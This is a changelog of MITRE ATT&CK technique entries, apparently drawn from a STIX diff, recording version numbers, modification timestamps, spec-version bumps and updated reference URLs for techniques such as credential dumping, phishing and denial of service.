values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:35:39.985000+00:00 | 2025-04-15 22:44:01.937000+00:00 |
[T1557.001] Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-25 15:46:55.393000+00:00 | 2025-04-15 22:44:23.234000+00:00 |
| x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[T1027.012] Obfuscated Files or Information: LNK Icon Smuggling
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-17 02:12:05.242000+00:00 | 2025-04-15 22:44:37.776000+00:00 |
[T1003.004] OS Credential Dumping: LSA Secrets
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-13 15:49:17.591000+00:00 | 2025-04-15 22:44:50.491000+00:00 |
[T1003.001] OS Credential Dumping: LSASS Memory
Current version: 1.5
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-13 13:52:45.379000+00:00 | 2025-04-15 22:45:12.834000+00:00 |
[T1608.005] Stage Capabilities: Link Target
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-16 20:09:41.391000+00:00 | 2025-04-15 22:45:40.961000+00:00 |
[T1222.002] File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-14 17:54:22.970000+00:00 | 2025-04-15 22:46:00.944000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1069.001] Permission Groups Discovery: Local Groups
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-07 17:14:42.184000+00:00 | 2025-04-15 22:46:25.458000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1037.002] Boot or Logon Initialization Scripts: Login Hook
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-20 16:42:05.094000+00:00 | 2025-04-15 22:46:43.054000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1037.001] Boot or Logon Initialization Scripts: Logon Script (Windows)
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-24 23:45:03.153000+00:00 | 2025-04-15 22:46:59.108000+00:00 |
[T1583.008] Acquire Infrastructure: Malvertising
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-16 20:10:08.246000+00:00 | 2025-04-15 22:47:29.928000+00:00 |
[T1588.001] Obtain Capabilities: Malware
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-17 16:15:52.805000+00:00 | 2025-04-15 22:47:58.443000+00:00 |
[T1587.001] Develop Capabilities: Malware
Current version: 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-01-14 17:14:27.890000+00:00 | 2025-04-15 22:47:44.654000+00:00 |
| external_references[5]['description'] | FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015. | FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved November 17, 2024. |
| external_references[5]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf | https://services.google.com/fh/files/misc/rpt-apt29-hammertoss-stealthy-tactics-define-en.pdf |
[T1036.010] Masquerading: Masquerade Account Name
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-17 15:20:36.705000+00:00 | 2025-04-15 22:48:14.966000+00:00 |
[T1036.004] Masquerading: Masquerade Task or Service
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-29 20:30:58.300000+00:00 | 2025-04-15 22:48:29.215000+00:00 |
[T1218.013] System Binary Proxy Execution: Mavinject
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-19 17:35:08.315000+00:00 | 2025-04-15 22:48:44.734000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1213.005] Data from Information Repositories: Messaging Applications
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-16 14:22:49.146000+00:00 | 2025-04-15 22:48:58.763000+00:00 |
[T1578.005] Modify Cloud Compute Infrastructure: Modify Cloud Compute Configurations
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-25 14:15:26.322000+00:00 | 2025-04-15 22:49:17.012000+00:00 |
[T1578] Modify Cloud Compute Infrastructure
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-30 13:28:37.414000+00:00 | 2025-04-15 22:49:33.134000+00:00 |
| external_references[1]['description'] | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. | Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024. |
[T1666] Modify Cloud Resource Hierarchy
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-25 16:15:41.224000+00:00 | 2025-04-15 22:49:45.874000+00:00 |
[T1111] Multi-Factor Authentication Interception
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:37:20.612000+00:00 | 2025-04-15 22:50:08.274000+00:00 |
| external_references[1]['description'] | Jackson, William. (2011, June 7). RSA confirms its tokens used in Lockheed hack. Retrieved September 24, 2018. | Jackson, William. (2011, June 7). RSA confirms its tokens used in Lockheed hack. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://gcn.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/ | https://www.route-fifty.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/ |
[T1621] Multi-Factor Authentication Request Generation
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 22:50:21.216000+00:00 |
[T1480.002] Execution Guardrails: Mutual Exclusion
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-28 16:22:25.431000+00:00 | 2025-04-15 22:50:39.088000+00:00 |
[T1498] Network Denial of Service
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:01:00.510000+00:00 | 2025-04-15 22:51:06.430000+00:00 |
| external_references[3]['description'] | Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019. | Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html | https://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html |
[T1584.008] Compromise Infrastructure: Network Devices
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:10:59.530000+00:00 | 2025-04-15 22:51:26.650000+00:00 |
[T1037.003] Boot or Logon Initialization Scripts: Network Logon Script
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-24 23:45:25.625000+00:00 | 2025-04-15 22:51:42.187000+00:00 |
[T1556.008] Modify Authentication Process: Network Provider DLL
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-05-04 18:02:51.318000+00:00 | 2025-04-15 22:51:56.379000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1590.006] Gather Victim Network Information: Network Security Appliances
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:31:54.275000+00:00 | 2025-04-15 22:52:16.483000+00:00 |
[T1135] Network Share Discovery
Current version: 3.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-29 19:44:43.870000+00:00 | 2025-04-15 22:52:30.350000+00:00 |
[T1590.004] Gather Victim Network Information: Network Topology
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:33:02.476000+00:00 | 2025-04-15 22:52:48.199000+00:00 |
[T1590.003] Gather Victim Network Information: Network Trust Dependencies
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:34:22.917000+00:00 | 2025-04-15 22:53:01.571000+00:00 |
[T1003] OS Credential Dumping
Current version: 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:12:43.034000+00:00 | 2025-04-15 22:53:37.617000+00:00 |
[T1499.001] Endpoint Denial of Service: OS Exhaustion Flood
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:51.289000+00:00 | 2025-04-15 22:53:56.462000+00:00 |
| external_references[3]['description'] | Corero. (n.d.). What is a SYN-ACK Flood Attack?. Retrieved April 22, 2019. | Corero. (n.d.). What is a SYN-ACK Flood Attack?. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html | https://web.archive.org/web/20220119104451/https://www.corero.com/resource-hub/syn-ack-flood-attack/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1588] Obtain Capabilities
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-16 16:19:41.568000+00:00 | 2025-04-15 22:54:16.100000+00:00 |
[T1137] Office Application Startup
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:01:21.255000+00:00 | 2025-04-15 22:54:32.990000+00:00 |
[T1137.001] Office Application Startup: Office Template Macros
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:01:35.918000+00:00 | 2025-04-15 22:54:50.299000+00:00 |
[T1137.002] Office Application Startup: Office Test
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:01:48.325000+00:00 | 2025-04-15 22:55:04.029000+00:00 |
[T1137.003] Office Application Startup: Outlook Forms
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:02:00.782000+00:00 | 2025-04-15 22:55:18.800000+00:00 |
[T1137.004] Office Application Startup: Outlook Home Page
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:02:13.742000+00:00 | 2025-04-15 22:55:34.415000+00:00 |
[T1137.005] Office Application Startup: Outlook Rules
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:02:26.206000+00:00 | 2025-04-15 22:55:47.125000+00:00 |
[T1556.002] Modify Authentication Process: Password Filter DLL
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-21 16:16:18.271000+00:00 | 2025-04-15 22:56:08.743000+00:00 |
[T1555.005] Credentials from Password Stores: Password Managers
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-19 13:53:33.661000+00:00 | 2025-04-15 22:56:22.300000+00:00 |
[T1574.009] Hijack Execution Flow: Path Interception by Unquoted Path
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:35.788000+00:00 | 2025-04-15 22:56:46.356000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1069] Permission Groups Discovery
Current version: 2.6
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:03:06.294000+00:00 | 2025-04-15 22:56:59.585000+00:00 |
[T1647] Plist File Modification
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-20 22:00:33.375000+00:00 | 2025-04-15 22:57:13.867000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1556.003] Modify Authentication Process: Pluggable Authentication Modules
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-21 16:19:55.082000+00:00 | 2025-04-15 22:57:26.573000+00:00 |
| external_references[3]['description'] | Fernández, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors & DNS requests. Retrieved June 26, 2020. | Fernández, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors & DNS requests. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://x-c3ll.github.io/posts/PAM-backdoor-DNS/ | https://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/ |
[T1003.007] OS Credential Dumping: Proc Filesystem
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:13:32.253000+00:00 | 2025-04-15 22:57:59.661000+00:00 |
[T1597.002] Search Closed Sources: Purchase Technical Data
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:44:43.900000+00:00 | 2025-04-15 22:58:36.430000+00:00 |
[T1012] Query Registry
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-03 18:56:37.011000+00:00 | 2025-04-15 22:58:50.612000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1563.002] Remote Service Session Hijacking: RDP Hijacking
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-14 15:37:02.771000+00:00 | 2025-04-15 22:59:04.979000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1498.002] Network Denial of Service: Reflection Amplification
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:04:34.495000+00:00 | 2025-04-15 22:59:22.782000+00:00 |
[T1114.002] Email Collection: Remote Email Collection
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 22:59:50.429000+00:00 |
[T1563] Remote Service Session Hijacking
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-02-26 14:21:37.818000+00:00 | 2025-04-15 23:00:02.178000+00:00 |
| external_references[2]['description'] | Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr 11 security incident. Retrieved February 17, 2020. | Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr 11 security incident. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident | https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/ |
[T1496] Resource Hijacking
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-13 17:00:09.759000+00:00 | 2025-04-15 23:00:21.372000+00:00 |
[T1556.005] Modify Authentication Process: Reversible Encryption
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-26 15:40:31.871000+00:00 | 2025-04-15 23:00:34.242000+00:00 |
[T1036.002] Masquerading: Right-to-Left Override
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-14 21:01:59.733000+00:00 | 2025-04-15 23:00:50.575000+00:00 |
[T1565.003] Data Manipulation: Runtime Data Manipulation
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 18:21:43.760000+00:00 | 2025-04-15 23:01:11.644000+00:00 |
| external_references[2]['description'] | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 17, 2024. |
[T1606.002] Forge Web Credentials: SAML Tokens
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 23:01:25.698000+00:00 |
| external_references[5]['description'] | Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021. | Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved November 17, 2024. |
| external_references[5]['url'] | https://www.sygnia.co/golden-saml-advisory | https://www.sygnia.co/threat-reports-and-advisories/golden-saml-attack/ |
[T1608.006] Stage Capabilities: SEO Poisoning
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-14 15:03:56.383000+00:00 | 2025-04-15 23:01:38.651000+00:00 |
[T1496.003] Resource Hijacking: SMS Pumping
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-16 17:45:14.210000+00:00 | 2025-04-15 23:02:00.718000+00:00 |
[T1505.001] Server Software Component: SQL Stored Procedures
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:05:24.007000+00:00 | 2025-04-15 23:02:13.653000+00:00 |
[T1596.005] Search Open Technical Databases: Scan Databases
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:49:49.260000+00:00 | 2025-04-15 23:02:32.145000+00:00 |
[T1595.001] Active Scanning: Scanning IP Blocks
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 13:46:55.039000+00:00 | 2025-04-15 23:02:44.660000+00:00 |
[T1029] Scheduled Transfer
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-28 00:26:48.769000+00:00 | 2025-04-15 23:03:03.336000+00:00 |
[T1113] Screen Capture
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:39.967000+00:00 | 2025-04-15 23:03:14.254000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1597] Search Closed Sources
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-04 13:12:14.469000+00:00 | 2025-04-15 23:03:31.068000+00:00 |
[T1593.002] Search Open Websites/Domains: Search Engines
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 19:19:47.758000+00:00 | 2025-04-15 23:03:45.401000+00:00 |
[T1596] Search Open Technical Databases
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-18 22:45:19.607000+00:00 | 2025-04-15 23:04:02.249000+00:00 |
| external_references[4]['description'] | NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. | NTT America. (n.d.). Whois Lookup. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.whois.net/ | https://who.is/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1593] Search Open Websites/Domains
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 19:19:47.759000+00:00 | 2025-04-15 23:04:23.505000+00:00 |
[T1594] Search Victim-Owned Websites
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-02 18:52:21.278000+00:00 | 2025-04-15 23:04:36.505000+00:00 |
[T1003.002] OS Credential Dumping: Security Account Manager
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:40:52.174000+00:00 | 2025-04-15 23:04:51.689000+00:00 |
[T1518.001] Software Discovery: Security Software Discovery
Current version: 1.5
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 00:15:53.303000+00:00 | 2025-04-15 23:05:09.449000+00:00 |
[T1555.002] Credentials from Password Stores: Securityd Memory
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:41:18.638000+00:00 | 2025-04-15 23:05:25.349000+00:00 |
| external_references[3]['description'] | Juuso Salonen. (2012, September 5). Breaking into the OS X keychain. Retrieved July 15, 2017. | Juuso Salonen. (2012, September 5). Breaking into the OS X keychain. Retrieved November 17, 2024. |
| external_references[3]['url'] | http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain | https://web.archive.org/web/20130106164109/https://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain |
[T1583.004] Acquire Infrastructure: Server
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-02-28 21:22:52.176000+00:00 | 2025-04-15 23:05:58.721000+00:00 |
| external_references[4]['description'] | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021. | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation | https://cloud.google.com/blog/topics/threat-intelligence/scandalous-external-detection-using-network-scan-data-and-automation/ |
[T1584.004] Compromise Infrastructure: Server
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-31 20:05:44.075000+00:00 | 2025-04-15 23:05:41.313000+00:00 |
| external_references[3]['description'] | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021. | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation | https://cloud.google.com/blog/topics/threat-intelligence/scandalous-external-detection-using-network-scan-data-and-automation/ |
[T1583.007] Acquire Infrastructure: Serverless
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-07-01 20:24:16.562000+00:00 | 2025-04-15 23:06:30.913000+00:00 |
[T1584.007] Compromise Infrastructure: Serverless
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-03 14:18:34.045000+00:00 | 2025-04-15 23:06:14.037000+00:00 |
[T1499.002] Endpoint Denial of Service: Service Exhaustion Flood
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:05:48.014000+00:00 | 2025-04-15 23:06:48.799000+00:00 |
[T1213.002] Data from Information Repositories: Sharepoint
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 23:07:18.929000+00:00 |
[T1593.001] Search Open Websites/Domains: Social Media
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:52:40.958000+00:00 | 2025-04-15 23:08:29.336000+00:00 |
[T1586.001] Compromise Accounts: Social Media Accounts
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-16 17:15:12.169000+00:00 | 2025-04-15 23:08:45.478000+00:00 |
[T1585.001] Establish Accounts: Social Media Accounts
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-16 17:37:34.563000+00:00 | 2025-04-15 23:09:01.225000+00:00 |
[T1205.002] Traffic Signaling: Socket Filters
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-20 19:56:18.579000+00:00 | 2025-04-15 23:09:39.651000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1592.002] Gather Victim Host Information: Software
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-17 16:33:19.596000+00:00 | 2025-04-15 23:09:53.612000+00:00 |
[T1566.001] Phishing: Spearphishing Attachment
Current version: 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:42:01.552000+00:00 | 2025-04-15 23:10:26.686000+00:00 |
| external_references[1]['description'] | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024. |
| external_references[4]['description'] | Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020. | Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql | https://www.elastic.co/security-labs/embracing-offensive-tooling-building-detections-against-koadic-using-eql |
[T1598.003] Phishing for Information: Spearphishing Link
Current version: 1.6
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-05-31 04:18:44.567000+00:00 | 2025-04-15 23:10:59.931000+00:00 |
| external_references[1]['description'] | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024. |
| external_references[11]['description'] | Ryte Wiki. (n.d.). Retrieved March 5, 2024. | Ryte Wiki. (n.d.). Retrieved November 17, 2024. |
| external_references[11]['url'] | https://en.ryte.com/wiki/Tracking_Pixel | https://en.ryte.com/wiki/Tracking_Pixel/ |
[T1566.002] Phishing: Spearphishing Link
Current version: 2.7
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:06:32.591000+00:00 | 2025-04-15 23:10:41.326000+00:00 |
| external_references[1]['description'] | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024. |
[T1598.001] Phishing for Information: Spearphishing Service
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:43:12.843000+00:00 | 2025-04-15 23:11:18.959000+00:00 |
[T1598.004] Phishing for Information: Spearphishing Voice
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-08 21:03:35.477000+00:00 | 2025-04-15 23:11:31.420000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1566.003] Phishing: Spearphishing via Service
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:16:30.272000+00:00 | 2025-04-15 23:11:50.622000+00:00 |
[T1562.011] Impair Defenses: Spoof Security Alerting
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-16 20:12:44.962000+00:00 | 2025-04-15 23:12:05.813000+00:00 |
[T1608] Stage Capabilities
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-19 22:01:05.551000+00:00 | 2025-04-15 23:12:21.613000+00:00 |
| external_references[9]['description'] | Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020. | Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved November 17, 2024. |
